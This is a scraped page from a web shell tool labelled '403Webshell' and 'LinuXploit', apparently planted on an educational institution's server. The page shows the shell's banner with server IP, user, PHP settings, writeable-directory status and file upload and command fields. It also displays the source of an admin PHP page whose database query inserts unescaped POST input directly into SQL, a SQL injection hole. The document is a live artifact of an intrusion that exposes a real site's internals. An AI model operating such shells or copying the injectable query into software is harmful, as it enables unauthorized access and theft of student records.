403Webshell
Server IP : 172.64.80.1  /  Your IP : 172.70.131.125
Web Server : Apache
System : Linux mail.federalpolyede.edu.ng 5.10.0-32-amd64 #1 SMP Debian 5.10.223-1 (2024-08-10) x86_64
User : federalpolyede.edu.ng_idh35skikv ( 10000)
PHP Version : 7.4.33
Disable Function : opcache_get_status
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/federalpolyede.edu.ng/httpdocs_backup/admin_main/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/vhosts/federalpolyede.edu.ng/httpdocs_backup/admin_main/ace_name_update.php
<?php
include('ace_headMain.php');
?>
<table width="100%" cellspacing="5" cellpadding="3">
          <tr>
            <td align="center"><!-- InstanceBeginEditable name="EditRegion3" -->
       <?php
		 if (isset($_SESSION['sName'] )){
			echo 'The Admin user Editing is: '.$_SESSION['sName'];
			echo'<br />';
			//require_once('../connect.php');
			$names =htmlspecialchars($_POST['names']);
			$sql = $db->query("SELECT * FROM ossce_admitted WHERE names like '%$names%'");
			//$result = mysql_query($sql);
			$num = $sql->rowCount();

       if ($num>0)
      // $sql_fetch= $sql->fetch(PDO::FETCH_BOTH);
			{
				?>
			<table width="200" border="1">
			<tr>
    			<th scope="col">No</th>
                <th scope="col">FormNo</th>
   				<th scope="col">Names</th>
                <th scope="col">Department</th>
                <th scope="col">Change</th> 
  			</tr>
            <?php
            $i=0;
            $no=0;

			 while ($row=$sql->fetch(PDO::FETCH_BOTH))
			 { 
			 $no = $i+1;
			  	echo '<tr>';
    		  	echo '<td>'.$no.'</td>';
				echo '<td>'.$row['formNo'].'</td>';
    		   	echo '<td>'.$row['names'].'</td>';
 				echo '<td>'.$row['course'].'</td>';
				echo '<td><a href="ace_changeName_process.php?form='.$row['formNo'].'" >Change Name</a></td>';
			 }
			 echo '</table>';
				} else {
					echo'No such Record Found';
				}
			
		}else{
			echo 'Un-Authorized Access....';
		}
				ob_end_flush();
	  ?>
          		<br />
<a href="logout.php">Log Out </a>
<!-- InstanceEndEditable --></td>
            </tr>
        </table></td>
      </tr>
      <tr>
        <td>&nbsp;</td>
      </tr>
    </table></td>
  </tr>
</table>
<p>&nbsp;</p>
<script type="text/javascript">
var MenuBar1 = new Spry.Widget.MenuBar("MenuBar1", {imgDown:"../SpryAssets/SpryMenuBarDownHover.gif", imgRight:"../SpryAssets/SpryMenuBarRightHover.gif"});
</script>
</body>
<!-- InstanceEnd --></html>

Youez - 2016 - github.com/yon3zu
LinuXploit